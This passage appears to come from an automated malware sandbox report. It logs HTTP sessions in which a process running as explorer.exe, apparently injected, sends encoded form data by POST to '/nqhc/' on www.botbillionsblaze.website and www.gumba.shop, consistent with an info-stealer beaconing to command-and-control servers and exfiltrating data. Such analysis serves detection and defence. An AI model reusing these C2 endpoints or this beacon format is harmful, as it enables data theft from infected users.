                                                                                                                                                                          Dec 5, 2022 15:19:19.335999966 CET12589OUTData Raw: 65 66 52 30 61 67 57 6a 52 4c 6c 57 53 65 66 32 51 72 28 6b 67 6c 48 6b 65 5a 42 79 6f 72 58 6a 36 48 4e 45 43 70 73 78 65 41 75 7a 49 43 69 49 34 4d 52 74 74 71 6a 42 78 6d 49 70 50 4c 68 45 77 73 54 30 76 50 64 68 31 43 6c 5a 38 32 6f 2d 33 6b
                                                                                                                                                                          Data Ascii: efR0agWjRLlWSef2Qr(kglHkeZByorXj6HNECpsxeAuzICiI4MRttqjBxmIpPLhEwsT0vPdh1ClZ82o-3kd80ImsyU38q5u4EcmT3yJQA4Okv3OcflVhVAz3NLikq2Sl4VEhDmTmfu0Tg39ud5h58y73~AXneLwwAQbwKAMNgMZO21ancTm5Dnylj4zfSjcpRaxXiCXYEQ4sKkWOED4Ybl2g2xz7qUzo524JmPRZFD7LjkNhTZN
                                                                                                                                                                          Dec 5, 2022 15:19:19.336091995 CET12590OUTData Raw: 73 39 67 61 62 32 47 36 39 55 6c 64 39 78 7e 6c 35 64 57 49 67 76 71 6a 4d 79 66 4d 35 4a 71 79 63 54 55 77 6a 71 6b 53 68 41 4c 30 6e 66 6b 55 39 6b 4e 38 70 54 32 42 5a 39 37 56 4e 69 54 59 34 42 66 57 69 75 53 45 49 57 38 37 68 51 44 79 42 71
                                                                                                                                                                          Data Ascii: s9gab2G69Uld9x~l5dWIgvqjMyfM5JqycTUwjqkShAL0nfkU9kN8pT2BZ97VNiTY4BfWiuSEIW87hQDyBqHoRlPy41p6XOq2OL1xN7avnPAYROXCN0uhIw8Kgk0VS4A8wTj9lEC5rSKhGxPYHZENHeNB~viRyjedxUIMsqMAWHeZyl8rt3gBCyi1FTA67TopxdDJV9t73ytrHbxg(ttwTnvkIcKnR9S-0sshIytv5vvxTlWc0bZ
                                                                                                                                                                          Dec 5, 2022 15:19:19.336241007 CET12594OUTData Raw: 54 6a 54 34 66 6c 50 58 34 48 76 38 61 34 6c 2d 52 47 37 4a 77 70 4f 78 72 34 42 42 74 6a 69 70 44 7a 71 34 54 41 6a 48 32 42 45 6e 68 38 68 45 4f 33 36 55 48 63 54 4f 57 4a 77 51 6a 36 71 79 30 73 7a 4a 61 62 33 35 76 66 32 6c 74 4e 42 44 44 65
                                                                                                                                                                          Data Ascii: TjT4flPX4Hv8a4l-RG7JwpOxr4BBtjipDzq4TAjH2BEnh8hEO36UHcTOWJwQj6qy0szJab35vf2ltNBDDe7B2K7c(o4Q7JaK3xdA3nc954~Lvqf0j4WuBOGi46CVsjGMfLs06xrtC19sY5Y18d4omHsYNEv1uA7FhI4jLcG1Lh9PubYHNS0qIxmuZXlFmvubkHto0-92kX7ekMKipGOivem9oYeXWMuMkU1CCYhzHXNfXn4IRyx
                                                                                                                                                                          Dec 5, 2022 15:19:19.366355896 CET12599INHTTP/1.1 403 Forbidden
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:19:19 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          75192.168.11.204992875.2.81.21280C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:19:21.343063116 CET12606OUTGET /nqhc/?7nWHV=f4F7ffrY91VPAaIYxk1J2He+DN38Gtglpvx7SxOWIh8xSFztRImtD0B4ZlSdLvIOg82xMJ3Gh/Bbh1FonXE4rjX3AOld5zRxFA==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.gumba.shop
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:19:21.481894970 CET12607INHTTP/1.1 403 Forbidden
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:19:21 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 146
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          76192.168.11.20499312.57.90.1680C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:19:26.513351917 CET12633OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.botbillionsblaze.website
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.botbillionsblaze.website
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.botbillionsblaze.website/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 45 71 56 72 78 4d 52 48 4c 42 43 77 74 49 62 4a 66 41 68 52 71 43 52 4d 49 47 52 69 76 5a 75 50 35 61 70 4c 47 30 7e 49 48 47 4b 36 61 36 42 64 71 72 46 39 31 53 53 38 65 43 45 79 73 31 59 37 52 49 59 35 7e 43 68 30 54 62 64 6e 6b 6b 6b 59 32 70 72 56 61 76 30 6a 70 63 47 44 64 53 51 53 43 6b 32 56 43 43 61 52 65 39 5a 68 54 50 4b 4e 42 78 34 51 6e 78 6d 75 36 6a 62 30 79 6a 6b 49 61 47 4d 44 65 34 6b 39 61 47 50 67 59 55 4f 4b 68 79 4e 54 70 53 52 54 33 46 4b 6c 39 69 34 52 70 58 62 33 68 38 4b 52 5a 55 52 48 67 62 52 4e 56 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=EqVrxMRHLBCwtIbJfAhRqCRMIGRivZuP5apLG0~IHGK6a6BdqrF91SS8eCEys1Y7RIY5~Ch0TbdnkkkY2prVav0jpcGDdSQSCk2VCCaRe9ZhTPKNBx4Qnxmu6jb0yjkIaGMDe4k9aGPgYUOKhyNTpSRT3FKl9i4RpXb3h8KRZURHgbRNVw).
                                                                                                                                                                          Dec 5, 2022 15:19:26.537566900 CET12633INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:19:26 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 146
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          77192.168.11.20499322.57.90.1680C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:19:28.558056116 CET12634OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.botbillionsblaze.website
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.botbillionsblaze.website
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.botbillionsblaze.website/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 45 71 56 72 78 4d 52 48 4c 42 43 77 69 49 72 4a 61 6a 5a 52 28 53 52 50 57 57 52 69 32 70 75 78 35 61 56 4c 47 31 71 59 48 77 61 36 64 65 4a 64 34 75 6c 39 79 53 53 38 57 69 45 33 6a 56 59 79 52 49 63 48 7e 48 5a 30 54 62 4a 6e 6c 56 45 59 33 5a 72 61 52 50 30 73 68 38 47 34 4d 43 51 4d 43 6b 4b 33 43 44 4f 52 65 4e 46 68 43 35 57 4e 51 31 56 47 71 78 6d 67 38 6a 62 37 70 7a 6b 4f 61 47 78 30 65 36 6b 4c 5a 77 48 67 59 31 75 4b 67 79 4e 53 77 79 52 49 72 31 4c 56 7e 68 6c 37 69 6c 66 55 37 38 53 2d 64 45 63 4b 30 4a 4e 4a 4b 61 46 48 68 62 7e 66 57 66 50 56 41 59 63 76 32 4d 33 79 72 2d 6e 59 32 62 59 65 6e 39 68 35 41 4f 63 57 56 77 7a 50 46 4b 65 33 6a 6f 48 7a 46 68 6d 53 46 36 31 4d 64 71 38 32 71 62 38 33 28 33 71 6a 32 53 46 2d 32 46 37 79 43 6f 79 50 74 4c 78 76 35 55 63 79 4f 43 4a 73 65 49 35 73 47 47 7e 79 6b 67 6b 49 52 4e 77 59 66 52 54 73 76 36 39 72 4b 66 39 4a 6d 51 63 64 31 67 59 62 31 47 66 71 44 45 56 6f 32 4a 49 6f 6f 32 67 54 32 54 47 5a 28 7a 44 4f 6d 41 5a 4e 58 7a 73 47 4a 69 76 62 37 2d 47 35 69 31 55 62 50 46 53 52 46 52 32 65 41 32 67 72 51 6c 4d 67 44 56 51 79 35 50 4e 32 41 49 31 59 63 57 38 74 6c 4d 34 30 43 71 33 6c 46 73 50 6c 50 66 45 45 52 63 70 32 55 4b 74 46 71 6a 53 43 4e 51 50 65 35 35 56 43 4e 79 73 47 65 6d 46 4b 30 37 54 33 6f 6c 36 4f 7a 66 4d 70 66 75 5a 5a 71 5f 45 36 6a 31 50 45 75 62 72 76 35 33 43 59 31 71 4e 47 6a 6c 54 6d 42 42 76 65 78 39 73 4b 73 73 4e 4a 6f 45 28 6a 46 67 63 72 75 2d 38 68 4c 61 72 6c 58 7a 71 30 77 5f 50 4e 53 46 6d 4f 68 49 55 42 5a 4e 42 5a 49 2d 46 79 35 5f 45 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=EqVrxMRHLBCwiIrJajZR(SRPWWRi2pux5aVLG1qYHwa6deJd4ul9ySS8WiE3jVYyRIcH~HZ0TbJnlVEY3ZraRP0sh8G4MCQMCkK3CDOReNFhC5WNQ1VGqxmg8jb7pzkOaGx0e6kLZwHgY1uKgyNSwyRIr1LV~hl7ilfU78S-dEcK0JNJKaFHhb~fWfPVAYcv2M3yr-nY2bYen9h5AOcWVwzPFKe3joHzFhmSF61Mdq82qb83(3qj2SF-2F7yCoyPtLxv5UcyOCJseI5sGG~ykgkIRNwYfRTsv69rKf9JmQcd1gYb1GfqDEVo2JIoo2gT2TGZ(zDOmAZNXzsGJivb7-G5i1UbPFSRFR2eA2grQlMgDVQy5PN2AI1YcW8tlM40Cq3lFsPlPfEERcp2UKtFqjSCNQPe55VCNysGemFK07T3ol6OzfMpfuZZq_E6j1PEubrv53CY1qNGjlTmBBvex9sKssNJoE(jFgcru-8hLarlXzq0w_PNSFmOhIUBZNBZI-Fy5_E.
                                                                                                                                                                          Dec 5, 2022 15:19:28.581801891 CET12635INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:19:28 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 146
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          78192.168.11.20499332.57.90.1680C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:19:30.609400034 CET12642OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.botbillionsblaze.website
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.botbillionsblaze.website
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.botbillionsblaze.website/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 45 71 56 72 78 4d 52 48 4c 42 43 77 69 49 72 4a 61 6a 5a 52 28 53 52 50 57 57 52 69 32 70 75 78 35 61 56 4c 47 31 71 59 48 77 53 36 64 70 4a 64 71 50 6c 39 7a 53 53 38 56 69 45 32 6a 56 5a 67 52 49 6b 39 7e 48 46 65 54 5a 78 6e 6c 45 55 59 30 76 28 61 55 50 30 74 69 38 47 41 64 53 51 59 43 6b 32 72 43 44 61 65 65 39 42 68 54 4f 36 4e 42 55 55 51 79 78 6d 75 38 6a 62 6e 28 44 6c 74 61 47 31 6b 65 36 34 4c 5a 79 7a 67 61 48 6d 4b 73 46 68 53 71 53 52 58 67 56 4c 61 30 42 6c 65 69 68 28 71 37 38 53 49 64 46 6f 4b 30 4c 56 4a 4c 5a 64 45 68 37 7e 66 49 76 50 53 45 59 52 6b 32 4d 62 55 72 2d 37 59 32 5a 6f 65 6c 64 68 35 56 66 63 52 57 51 79 45 42 4b 65 6b 6e 6f 44 37 46 68 61 47 46 34 35 4d 64 36 6f 32 77 4b 38 33 38 56 4f 6a 7e 53 46 38 79 46 37 74 55 59 7a 51 74 4c 42 7a 35 56 39 50 4f 46 4a 73 59 6f 5a 73 51 55 47 78 6a 41 6b 4b 64 74 77 42 4a 68 66 6f 76 2d 5a 38 4b 66 39 6a 6d 55 6b 64 31 52 6f 62 30 48 66 74 41 55 56 56 76 5a 49 48 6d 57 6c 53 32 54 61 52 28 79 37 65 6d 43 31 4e 56 54 73 47 66 52 47 4e 69 65 47 2d 36 46 55 4a 51 56 54 52 46 52 72 39 41 33 6b 52 58 52 45 67 41 46 41 79 7e 66 4e 31 43 6f 30 52 57 32 38 52 30 63 34 30 43 71 36 42 46 70 58 6c 4f 74 55 45 52 72 74 32 52 5a 56 46 73 6a 54 4a 4e 51 4f 61 35 35 52 48 4e 79 6c 52 65 6d 5a 77 30 34 28 33 70 77 6d 4f 30 65 4d 75 62 65 5a 51 75 5f 46 69 75 56 44 70 75 62 6e 64 35 33 54 76 79 5a 5a 47 69 6c 44 6d 46 42 76 66 37 39 73 4e 36 38 4e 62 28 55 44 4a 46 67 42 63 75 5f 35 2d 4c 59 37 6c 58 53 4b 76 67 75 66 71 4d 31 32 5a 6a 4d 55 43 52 4c 5a 46 61 72 70 73 6e 5a 71 7a 68 33 44 42 5a 74 33 55 78 59 67 55 31 62 69 6e 4c 44 4a 41 71 54 6b 56 72 6b 76 55 35 5f 4a 55 79 4d 6e 38 63 76 76 4e 57 31 74 4d 56 48 46 41 61 37 70 75 74 55 77 4f 64 53 66 45 59 5a 47 67 35 43 6c 69 68 30 51 7a 28 56 32 75 36 39 67 58 42 32 7e 43 4a 6e 63 4b 32 5a 61 70 4c 76 32 47 33 79 61 67 61 6f 69 77 33 47 6e 44 62 39 34 75 30 69 4c 53 54 63 6f 56 74 41 6f 72 62 70 44 73 46 64 6f 6a 41 73 46 66 42 75 6d 33 41 48 71 73 7e 48 57 50 77 52 44 6e 28 6f 35 56 49 62 35 30 47 7a 56 70 43 5f 5a 5a 75 4f 6e 77 42 50 43 2d 28 47 7a 62 54 2d 48 37 59 35 75 32 48 4f 72 6e 56 62 69 77 4d 43 4b 4b 28 7a 78 30 54 76 78 75 48 78 38 42 31 38 49 32 47 6b 4c 35 70 70 72 4f 77 38 4d 58 31 39 6c 4c 76 48 68 44 79 6b 4a 6a 59 52 46 71 6a 43 69 6a 46 66 79 45 57 66 73 38 55 69 59 50 43 32 58 66 68 57 50 37 6c 37 50 32 44 5a 30 69 75 46 4f 39 36 78 35 41 48 5f 69 75 76 52 77 65 79 36 4f 56 54 32 57 78 67 70 65 58 50 79 51 46 4c 31 36 68 7a 55 4a 31 50 77 67 71 48 41 6b 53 6b 44 6f 63 71 64 7a 65 55 45 36 79 42 66 77 68 33 78 79 70 57 39 7e 75 45 39 76 49 35 43 67 4d 6d 6c 6d 33 70 65 41 59 46 78 33 4c 45 72 39 49 73 49 78 2d 4f 4b 51 7a 38 55 78 72 56 30 4b 49 5a 4a 55 31 7e 2d 45 7a 28 6a 68 5f 78 70 4b 4b 59 7a 63 39 72 6e 63 77 46 4d 6c 77 39 37 63 62 35 4e 61 66 6c 47 43 73 70 64 53 73 38 72 69 39 70 62 46 43 46 4b 6c 36 6a 57 4c 79 50 35 55 4b 39 69 72 31 6e 6d 6a 4c 36 41 58 45 4c 6b 4b 56 62 39 75 6d 51 37 7e 34 67 57 6a 52 65 69 47 39 59 39 47 6e 31 2d 6b 36 36 56 42 41 34 36 30 35 77 30 51 5f 54 5f 73 6a 51 2d 4a 37 4c 67 30 49 79 76 6f 57 6b 57 5a 45 30 53 64 51 38 71 69 4e 55 74 30 75 53 78 68 4d 35 45 33 70 61 30 28 32 45 6a 36 65 41 58 71 57 59 4c 53 48 77 43 31 4d 33 46 58 7a 61 6c 6b 79 49 56 77 44 79 51 64 35 56 64 62 46 65 68 59 5a 45 53 77 2d 6b 66 52 46 75 62 28 55 46 7a 7a 36 76 54 31 62 7e 77 6d 31 35 6d 4d 33 7a 4d 68 64 65 72 63 72 31 70 6e 4e 7e 44 78 43 39 57 59 5a 49 4b 43 34 37 6a 71 56 68 66 30 51 48 4d 53 51 4e 73 5a 63 75 49 62 6e 67 57 54 38 55 51 6d 2d 32 45 6f 6c 43 58 44 59 6d 48 48 35 6d 6d 65 4c 62 32 31 73 4a 59 39 65 70 35 58 6d 54 37 46 79 4e 4f 7a 30 74 64 28 66 6e 56 4e 61 42 79 6a 46 75 70 76 4c 42 6e 79 4d 41 67 6c 30 71 2d 34 74 70 30 66 6e 73 65 6a 77 34 6d 6c 33 44 42 7e 42 51 4b 72 47 62 46 37 53 4f 65 64 34 4f 30 79 4d 76 65 48 4e 45 6f 54 78 4f 35 53 55 6c 49 6f 51 48 66 66 57 45 47 4f 71 46 50 68 67 76 65 4e 66 77 47 4b 41 66 6b 42 53 39 47 7a 47 6c 49 4f 53 64 66 31 45 50 4e 6a 71 69 30 43 5a 64 34 44 54 77 4f 59 53 52 65 64 7a 4e
                                                                                                                                                                          Data Ascii: 7nWHV=EqVrxMRHLBCwiIrJajZR(SRPWWRi2pux5aVLG1qYHwS6dpJdqPl9zSS8ViE2jVZgRIk9~HFeTZxnlEUY0v(aUP0ti8GAdSQYCk2rCDaee9BhTO6NBUUQyxmu8jbn(DltaG1ke64LZyzgaHmKsFhSqSRXgVLa0Bleih(q78SIdFoK0LVJLZdEh7~fIvPSEYRk2MbUr-7Y2Zoeldh5VfcRWQyEBKeknoD7FhaGF45Md6o2wK838VOj~SF8yF7tUYzQtLBz5V9POFJsYoZsQUGxjAkKdtwBJhfov-Z8Kf9jmUkd1Rob0HftAUVVvZIHmWlS2TaR(y7emC1NVTsGfRGNieG-6FUJQVTRFRr9A3kRXREgAFAy~fN1Co0RW28R0c40Cq6BFpXlOtUERrt2RZVFsjTJNQOa55RHNylRemZw04(3pwmO0eMubeZQu_FiuVDpubnd53TvyZZGilDmFBvf79sN68Nb(UDJFgBcu_5-LY7lXSKvgufqM12ZjMUCRLZFarpsnZqzh3DBZt3UxYgU1binLDJAqTkVrkvU5_JUyMn8cvvNW1tMVHFAa7putUwOdSfEYZGg5Clih0Qz(V2u69gXB2~CJncK2ZapLv2G3yagaoiw3GnDb94u0iLSTcoVtAorbpDsFdojAsFfBum3AHqs~HWPwRDn(o5VIb50GzVpC_ZZuOnwBPC-(GzbT-H7Y5u2HOrnVbiwMCKK(zx0TvxuHx8B18I2GkL5pprOw8MX19lLvHhDykJjYRFqjCijFfyEWfs8UiYPC2XfhWP7l7P2DZ0iuFO96x5AH_iuvRwey6OVT2WxgpeXPyQFL16hzUJ1PwgqHAkSkDocqdzeUE6yBfwh3xypW9~uE9vI5CgMmlm3peAYFx3LEr9IsIx-OKQz8UxrV0KIZJU1~-Ez(jh_xpKKYzc9rncwFMlw97cb5NaflGCspdSs8ri9pbFCFKl6jWLyP5UK9ir1nmjL6AXELkKVb9umQ7~4gWjReiG9Y9Gn1-k66VBA4605w0Q_T_sjQ-J7Lg0IyvoWkWZE0SdQ8qiNUt0uSxhM5E3pa0(2Ej6eAXqWYLSHwC1M3FXzalkyIVwDyQd5VdbFehYZESw-kfRFub(UFzz6vT1b~wm15mM3zMhdercr1pnN~DxC9WYZIKC47jqVhf0QHMSQNsZcuIbngWT8UQm-2EolCXDYmHH5mmeLb21sJY9ep5XmT7FyNOz0td(fnVNaByjFupvLBnyMAgl0q-4tp0fnsejw4ml3DB~BQKrGbF7SOed4O0yMveHNEoTxO5SUlIoQHffWEGOqFPhgveNfwGKAfkBS9GzGlIOSdf1EPNjqi0CZd4DTwOYSRedzNyPYuX3yaUp47ZNEA6gr6N7siB5noOsCYuA89QGkKJMJ3cA3p4uPkEr0oxj3JzQxaRY3jR7QQa0sB988ShXtp1ESKZGNJQAJaqRgpZ4d~KyizngnQS6VBY38zzrj41dOcAm2b31w9eLqfTidFc0eCrDi(QRINHLPfYgI7V83jwv01JEFEz049oNl86vUIghru8Vd1_y5OidPLdb3Po(R6uUniDwZH1aHJrTT1r3y6pJjx5tUYyu-H8sM4l(hccCP~orQ(Dmpm_RG3uqwSA~aDIeNBtI-zfsSWNCjaY8nhe8TbWS1R1bMb7NKl4hZBfkBKmp8i1JPyiKNEoJNq-lzezgNsC8oIgY1psPJmZHgYXH7QA5FkYW5ymKvleLMFCvprsBgwldGEP60Se3F0rIjDBASQbQz5ya8jo9V4y15FQbBEgUyuAlWGV3LncPjlBOQtFbWFxtMpkaruvmwP220i0~ad3tOagMYnuQPWJX49DC12nlyosFM4lfVrrGIrjzqi-uGJ7yH350Q9OQP4EXLoIOaO9i6r9qweZqZUdqVzlPxZ_MkaPXFjDct39AuRfL2vcjONNQ_qxhmrGujAbJpSx~hBwKqz4sXXo3cEsZ0VBy9yX7t9QFRiL(oI_RzjNKClhzOhVS-oJ82LXu6kRzcdPGhY2jS1N~yV9MZNyfIfP9ji-l_JgjySu5v1ArUe-MHHur5CNdIXTmhWymRq7KS8x17fFh4OxbJS1D1ytJ-xpQJ4puP8o8bIk(YGblOrHd-bvyKhwEL2mGR4_Ejvvec~xflDQm_G2w2DRExWeyfTYydTqo9B026xnmbJCqVq-~IqrLpyC0y(OJbncZ7oIJ6E6rKACh1LoF_42SrAahv9YH6PUwhKMcmSHktV_oWto217JJV13oc21M7PTzFWbacrEafagypWfi84yl70oMm7sGpdDFV5lrMYhs4Sd3rg4o4arH_ry84dMIjr55zvw43ut4ZKmP_rIfkiK4QHfQCwTXLx9YI(ke_UMlghr(-qwowXaMUxXPN3jyqCcD4uUWO33nZ7fx9bhOCMZ30JbLERc7Rf3SdEN5JY89MxRChv3detFxbzb(VFVLr27RDLmou(a67TEoUs4K2ZVTxCr1PyeQzuGFuFaD1wP5ad6JOyHq4Tus6KhFyWlYQWIHyozssZsPnYPgk5WL9b18yV1skNqRcJxT5Ex3hHwXwbXZmXKgVMpJv0k(6PVs9uelbbpXg7DNXon0Z92Ea9ZDNdjU-ur4WHcbht8u6aQXNZosF1im782CPcYEDbe2zYUAmBc8qDkbP0q0v6VypcRDL~FGV76y4wXEckVYF6ArIhmVpCNDUNAdxfyruF5tFF1~8jfj67URcX0TweO7cyAyPIUPEZJGCLSpn(A1PzyMJ~WtPERwsVNVMX9vaS2RfQYOUgDf_Kkj1(WwGGBW0b3ftlLCV6T8BoFUUdDiyUdL0HJiAh9MhohG0du0uXYV4IkNF9GqPQmP02EzCIOd8RrVE(oWnKsYNv7ngXVLhugT-2Xd2yMRvUAaYtvtlBBTVpGlOYySzkTWGplgle4XEk3U11DzW(PiNHN7jCW5XZIYmx4x4sbMzGnW5tCzOJAiS~5nh(JnFrnx2Ox1mRw9Hwb0WSC2pWadHSe1Lv9OooDqgnPpNdKELq7W1q_cBF8beAf4v(37ZTAmalA09sAul1Mha6V0CjiNPjIa2HdAJMds9ipQ0uEPgnPz25eBZhNJCXGKZcUGcoDUYRSLOwt68tBkXmCQ9nczM2DhG0UfqRmvDU9lxk6JohKaIzhh4tQc1Jzt1Ul2_ZtMF7maFCI1-vYAy4r(JEGmfjIwkyWm5anCR5H10wpk-qAjcnheFCOnd0lNHBSzsnN5IM4zxawDeABt-Lqsh8dgJ2JRg9ur76n4jOAhWSvyfv5oaPU5qoE0LAvM575AFHgHOfISxpYhJGad5AM2mvXwUl0ozmhzhSQWblke9ParlsVDZxLXUlA6vOyFm4QaRgPt8sH1IJn1FXMhz8rX_8QpRTRbpFes2qMhkAQ3HINS-sWlh2qLIs2dmziX86eQE(uu-a-7XmeHSmEUn9sccvdCw4n1ccbiNfScVBxKxKE(HoqzNrWEQM347q_m6~Qg_pa05oQa5u0y2jLGXtb6fP6jQOUL9zxt2dzTeFFVCZw5TyX8fJ3pVtPBNsGQu8YZlUKmmjhbljMgJU5SEtwkSvunGl9b3uH1T6qnyWChbA9hx59NQcVIZ5SL5K-F-49xSetATqOK7RL9FkDyh8pOH4KlZjoz4M1DkbmFMieWy2s7erxNbShpBtEg_vMBWWUKWIPsCUd~m2Rmh2C6Z5Dpbllqyku5hKozw4W~7tao-DTOXayF2BmdDAcANH6VImalsTuzyZjRHjvR0wAoxKe7KKXh742ZorDfpXGl7oOMn7nHGWqyOVhAyvl8FTFmdyFXpwOxBVQaDklhw86jH(GPtb3DjBgZeA_puDdo9~R5XZFkXAJDRgkj2ZmkZX51TiP7RQG1mEhU6yBUfsX7LSDI8MVWMjst57SUnsUaAxDTgDLx8Bv~qw1V_~yFKCNAUgjSIHxx8os5ZqIZVUOZbpl(fc3fiNOXuF1gOMHevEYY-(C0aKeg5pcViZJ7q9ghGlXYDxWtYynNAgY7B8ahA9pGbs7p79K~Zbg